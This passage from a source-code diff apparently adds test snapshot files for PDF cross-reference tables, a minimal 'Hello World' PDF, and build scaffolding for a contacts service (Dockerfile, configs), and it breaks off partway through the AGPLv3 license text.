0000000..a76dcc2 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/latex_compiler/XrefTable.json @@ -0,0 +1,140 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 65535, + "free": true + }, + { + "offset": 25097, + "gen": 0, + "uncompressed": true + }, + { + "offset": 25156, + "gen": 0, + "uncompressed": true + }, + { + "offset": 25367, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 854, + "gen": 0, + "uncompressed": true + }, + { + "offset": 919, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1074, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1245, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18343, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18388, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18752, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19071, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19360, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19604, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19770, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20007, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20174, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20424, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20456, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20525, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23109, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23500, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24229, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24641, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24741, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24985, + "gen": 0, + "uncompressed": true + } + ], + "startXRefTable": 26815 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/lualatex_compiler/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/lualatex_compiler/XrefTable.json new file mode 100644 index 0000000..adb457f --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/lualatex_compiler/XrefTable.json @@ -0,0 +1,94 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 3568, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3777, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 643, + "gen": 0, + "uncompressed": true + }, + { + "offset": 693, + "gen": 0, + "uncompressed": true + }, + { + "offset": 819, + "gen": 0, + "uncompressed": true + }, + { + "offset": 934, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1118, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1210, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2555, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3030, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + } + ], + "startXRefTable": 3777 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/makeindex-custom-style/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/makeindex-custom-style/XrefTable.json new file mode 100644 index 0000000..c9aa365 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/makeindex-custom-style/XrefTable.json @@ -0,0 +1,128 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 16762, + "gen": 0, + "uncompressed": true + }, + { + "offset": 16877, + "gen": 0, + "uncompressed": true + }, + { + "offset": 17142, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24335, + "gen": 0, + "uncompressed": true + }, + { + "offset": 32164, + "gen": 0, + "uncompressed": true + }, + { + "offset": 32412, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 671, + "gen": 0, + "uncompressed": true + }, + { + "offset": 721, + "gen": 0, + "uncompressed": true + }, + { + "offset": 856, + "gen": 0, + "uncompressed": true + }, + { + "offset": 973, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1318, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2218, + "gen": 0, + "uncompressed": true + }, + { + "offset": 13, + "gen": 0 + }, + { + "offset": 13, + "gen": 1 + }, + { + "offset": 13, + "gen": 2 + }, + { + "offset": 13, + "gen": 3 + }, + { + "offset": 13, + "gen": 4 + }, + { + "offset": 13, + "gen": 5 + }, + { + "offset": 13, + "gen": 6 + }, + { + "offset": 13, + "gen": 7 + }, + { + "offset": 13, + "gen": 8 + }, + { + "offset": 13, + "gen": 9 + }, + { + "offset": 13, + "gen": 10 + }, + { + "offset": 13, + "gen": 11 + } + ], + "startXRefTable": 32412 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/makeindex/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/makeindex/XrefTable.json new file mode 100644 index 0000000..9027317 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/makeindex/XrefTable.json @@ -0,0 +1,111 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 16778, + "gen": 0, + "uncompressed": true + }, + { + "offset": 16893, + "gen": 0, + "uncompressed": true + }, + { + "offset": 17109, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24938, + "gen": 0, + "uncompressed": true + }, + { + "offset": 25186, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 650, + "gen": 0, + "uncompressed": true + }, + { + "offset": 700, + "gen": 0, + "uncompressed": true + }, + { + "offset": 836, + "gen": 0, + "uncompressed": true + }, + { + "offset": 953, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1298, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2103, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + }, + { + "offset": 12, + "gen": 6 + }, + { + "offset": 12, + "gen": 7 + }, + { + "offset": 12, + "gen": 8 + } + ], + "startXRefTable": 25186 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/minted/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/minted/XrefTable.json new file mode 100644 index 0000000..1b93bf0 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/minted/XrefTable.json @@ -0,0 +1,97 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 20679, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20927, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 650, + "gen": 0, + "uncompressed": true + }, + { + "offset": 700, + "gen": 0, + "uncompressed": true + }, + { + "offset": 826, + "gen": 0, + "uncompressed": true + }, + { + "offset": 934, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1252, + "gen": 0, + "uncompressed": true + }, + { + "offset": 8248, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20115, + "gen": 0, + "uncompressed": true + }, + { + "offset": 11, + "gen": 0 + }, + { + "offset": 11, + "gen": 1 + }, + { + "offset": 11, + "gen": 2 + }, + { + "offset": 11, + "gen": 3 + }, + { + "offset": 11, + "gen": 4 + }, + { + "offset": 11, + "gen": 5 + }, + { + "offset": 11, + "gen": 6 + }, + { + "offset": 11, + "gen": 7 + } + ], + "startXRefTable": 20927 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/multibib_bibliography/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/multibib_bibliography/XrefTable.json new file mode 100644 index 0000000..095ae85 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/multibib_bibliography/XrefTable.json @@ -0,0 +1,156 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 29506, + "gen": 0, + "uncompressed": true + }, + { + "offset": 29621, + "gen": 0, + "uncompressed": true + }, + { + "offset": 29918, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30033, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30274, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30389, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30644, + "gen": 0, + "uncompressed": true + }, + { + "offset": 42802, + "gen": 0, + "uncompressed": true + }, + { + "offset": 43050, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 695, + "gen": 0, + "uncompressed": true + }, + { + "offset": 746, + "gen": 0, + "uncompressed": true + }, + { + "offset": 900, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1017, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1286, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2443, + "gen": 0, + "uncompressed": true + }, + { + "offset": 13147, + "gen": 0, + "uncompressed": true + }, + { + "offset": 16, + "gen": 0 + }, + { + "offset": 16, + "gen": 1 + }, + { + "offset": 16, + "gen": 2 + }, + { + "offset": 16, + "gen": 3 + }, + { + "offset": 16, + "gen": 4 + }, + { + "offset": 16, + "gen": 5 + }, + { + "offset": 16, + "gen": 6 + }, + { + "offset": 16, + "gen": 7 + }, + { + "offset": 16, + "gen": 8 + }, + { + "offset": 16, + "gen": 9 + }, + { + "offset": 16, + "gen": 10 + }, + { + "offset": 16, + "gen": 11 + }, + { + "offset": 16, + "gen": 12 + }, + { + "offset": 16, + "gen": 13 + } + ], + "startXRefTable": 43050 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/nomenclature/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/nomenclature/XrefTable.json new file mode 100644 index 0000000..dac0da2 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/nomenclature/XrefTable.json @@ -0,0 +1,114 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 34102, + "gen": 0, + "uncompressed": true + }, + { + "offset": 34350, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 678, + "gen": 0, + "uncompressed": true + }, + { + "offset": 728, + "gen": 0, + "uncompressed": true + }, + { + "offset": 856, + "gen": 0, + "uncompressed": true + }, + { + "offset": 971, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1514, + "gen": 0, + "uncompressed": true + }, + { + "offset": 10973, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19139, + "gen": 0, + "uncompressed": true + }, + { + "offset": 33047, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + }, + { + "offset": 12, + "gen": 6 + }, + { + "offset": 12, + "gen": 7 + }, + { + "offset": 12, + "gen": 8 + }, + { + "offset": 12, + "gen": 9 + }, + { + "offset": 12, + "gen": 10 + } + ], + "startXRefTable": 34350 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/references_in_include/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/references_in_include/XrefTable.json new file mode 100644 index 0000000..1295744 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/references_in_include/XrefTable.json @@ -0,0 +1,111 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 9449, + "gen": 0, + "uncompressed": true + }, + { + "offset": 9564, + "gen": 0, + "uncompressed": true + }, + { + "offset": 9730, + "gen": 0, + "uncompressed": true + }, + { + "offset": 17293, + "gen": 0, + "uncompressed": true + }, + { + "offset": 17541, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 650, + "gen": 0, + "uncompressed": true + }, + { + "offset": 700, + "gen": 0, + "uncompressed": true + }, + { + "offset": 835, + "gen": 0, + "uncompressed": true + }, + { + "offset": 952, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1097, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1758, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + }, + { + "offset": 12, + "gen": 6 + }, + { + "offset": 12, + "gen": 7 + }, + { + "offset": 12, + "gen": 8 + } + ], + "startXRefTable": 17541 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/simple_bibliography/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/simple_bibliography/XrefTable.json new file mode 100644 index 0000000..e3a2a73 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/simple_bibliography/XrefTable.json @@ -0,0 +1,114 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 37282, + "gen": 0, + "uncompressed": true + }, + { + "offset": 37530, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 678, + "gen": 0, + "uncompressed": true + }, + { + "offset": 728, + "gen": 0, + "uncompressed": true + }, + { + "offset": 856, + "gen": 0, + "uncompressed": true + }, + { + "offset": 971, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1322, + "gen": 0, + "uncompressed": true + }, + { + "offset": 9581, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24286, + "gen": 0, + "uncompressed": true + }, + { + "offset": 36258, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + }, + { + "offset": 12, + "gen": 6 + }, + { + "offset": 12, + "gen": 7 + }, + { + "offset": 12, + "gen": 8 + }, + { + "offset": 12, + "gen": 9 + }, + { + "offset": 12, + "gen": 10 + } + ], + "startXRefTable": 37530 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/subdirectories/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/subdirectories/XrefTable.json new file mode 100644 index 0000000..d789009 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/subdirectories/XrefTable.json @@ -0,0 +1,128 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 48194, + "gen": 0, + "uncompressed": true + }, + { + "offset": 48442, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 699, + "gen": 0, + "uncompressed": true + }, + { + "offset": 749, + "gen": 0, + "uncompressed": true + }, + { + "offset": 878, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1000, + "gen": 0, + "uncompressed": true + }, + { + "offset": 8546, + "gen": 0, + "uncompressed": true + }, + { + "offset": 9072, + "gen": 0, + "uncompressed": true + }, + { + "offset": 10659, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18919, + "gen": 0, + "uncompressed": true + }, + { + "offset": 35129, + "gen": 0, + "uncompressed": true + }, + { + "offset": 47101, + "gen": 0, + "uncompressed": true + }, + { + "offset": 14, + "gen": 0 + }, + { + "offset": 14, + "gen": 1 + }, + { + "offset": 14, + "gen": 2 + }, + { + "offset": 14, + "gen": 3 + }, + { + "offset": 14, + "gen": 4 + }, + { + "offset": 14, + "gen": 5 + }, + { + "offset": 14, + "gen": 6 + }, + { + "offset": 14, + "gen": 7 + }, + { + "offset": 14, + "gen": 8 + }, + { + "offset": 14, + "gen": 9 + }, + { + "offset": 14, + "gen": 10 + }, + { + "offset": 14, + "gen": 11 + } + ], + "startXRefTable": 48442 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/tikz_feynman/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/tikz_feynman/XrefTable.json new file mode 100644 index 0000000..fb9584d --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/tikz_feynman/XrefTable.json @@ -0,0 +1,168 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 2924, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3039, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4606, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4721, + "gen": 0, + "uncompressed": true + }, + { + "offset": 7754, + "gen": 0, + "uncompressed": true + }, + { + "offset": 7870, + "gen": 0, + "uncompressed": true + }, + { + "offset": 11668, + "gen": 0, + "uncompressed": true + }, + { + "offset": 21077, + "gen": 0, + "uncompressed": true + }, + { + "offset": 28498, + "gen": 0, + "uncompressed": true + }, + { + "offset": 35464, + "gen": 0, + "uncompressed": true + }, + { + "offset": 35699, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 703, + "gen": 0, + "uncompressed": true + }, + { + "offset": 754, + "gen": 0, + "uncompressed": true + }, + { + "offset": 909, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1026, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2161, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18, + "gen": 0 + }, + { + "offset": 18, + "gen": 1 + }, + { + "offset": 18, + "gen": 2 + }, + { + "offset": 18, + "gen": 3 + }, + { + "offset": 18, + "gen": 4 + }, + { + "offset": 18, + "gen": 5 + }, + { + "offset": 18, + "gen": 6 + }, + { + "offset": 18, + "gen": 7 + }, + { + "offset": 18, + "gen": 8 + }, + { + "offset": 18, + "gen": 9 + }, + { + "offset": 18, + "gen": 10 + }, + { + "offset": 18, + "gen": 11 + }, + { + "offset": 18, + "gen": 12 + }, + { + "offset": 18, + "gen": 13 + }, + { + "offset": 18, + "gen": 14 + }, + { + "offset": 18, + "gen": 15 + }, + { + "offset": 18, + "gen": 16 + } + ], + "startXRefTable": 35699 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/xelatex_compiler/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/xelatex_compiler/XrefTable.json new file mode 100644 index 0000000..610f719 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/xelatex_compiler/XrefTable.json @@ -0,0 +1,98 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 8578, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 658, + "gen": 0, + "uncompressed": true + }, + { + "offset": 708, + "gen": 0, + "uncompressed": true + }, + { + "offset": 837, + "gen": 0, + "uncompressed": true + }, + { + "offset": 940, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1191, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1627, + "gen": 0, + "uncompressed": true + }, + { + "offset": 7676, + "gen": 0, + "uncompressed": true + }, + { + "offset": 7784, + "gen": 0, + "uncompressed": true + }, + { + "offset": 7822, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + }, + { + "offset": 12, + "gen": 6 + } + ], + "startXRefTable": 8578 +} \ No newline at end of file diff --git a/services/clsi/tiny.pdf b/services/clsi/tiny.pdf new file mode 100644 index 0000000..1c64181 --- /dev/null +++ b/services/clsi/tiny.pdf @@ -0,0 +1,58 @@ +%PDF-1.1 +%¥±ë + +1 0 obj + << /Type /Catalog + /Pages 2 0 R + >> +endobj + +2 0 obj + << /Type /Pages + /Kids [3 0 R] + /Count 1 + /MediaBox [0 0 300 144] + >> +endobj + +3 0 obj + << /Type /Page + /Parent 2 0 R + /Resources + << /Font + << /F1 + << /Type /Font + /Subtype /Type1 + /BaseFont /Times-Roman + >> + >> + >> + /Contents 4 0 R + >> +endobj + +4 0 obj + << /Length 55 >> +stream + BT + /F1 18 Tf + 0 0 Td + (Hello World) Tj + ET +endstream +endobj + +xref +0 5 +0000000000 65535 f +0000000018 00000 n +0000000077 00000 n +0000000178 00000 n +0000000457 00000 n +trailer + << /Root 1 0 R + /Size 5 + >> +startxref +565 +%%EOF diff --git a/services/clsi/tsconfig.json b/services/clsi/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/clsi/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/contacts/.eslintrc b/services/contacts/.eslintrc new file mode 100644 index 0000000..cc68024 --- /dev/null +++ b/services/contacts/.eslintrc @@ -0,0 +1,6 @@ +{ + "parserOptions": { + "ecmaVersion": 2022, + "sourceType": "module" + } +} diff --git a/services/contacts/.gitignore b/services/contacts/.gitignore new file mode 100644 index 0000000..80bac79 --- /dev/null +++ b/services/contacts/.gitignore @@ -0,0 +1,5 @@ +node_modules +forever + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/contacts/.mocharc.json b/services/contacts/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/contacts/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/contacts/.nvmrc b/services/contacts/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/contacts/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/contacts/Dockerfile b/services/contacts/Dockerfile new file mode 100644 index 0000000..69d2d35 --- /dev/null +++ b/services/contacts/Dockerfile @@ -0,0 +1,27 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/contacts + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/contacts/package.json /overleaf/services/contacts/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/contacts/ /overleaf/services/contacts/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/contacts/LICENSE b/services/contacts/LICENSE new file mode 100644 index 0000000..ac8619d --- /dev/null +++ b/services/contacts/LICENSE @@ -0,0 +1,662 @@ + + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each 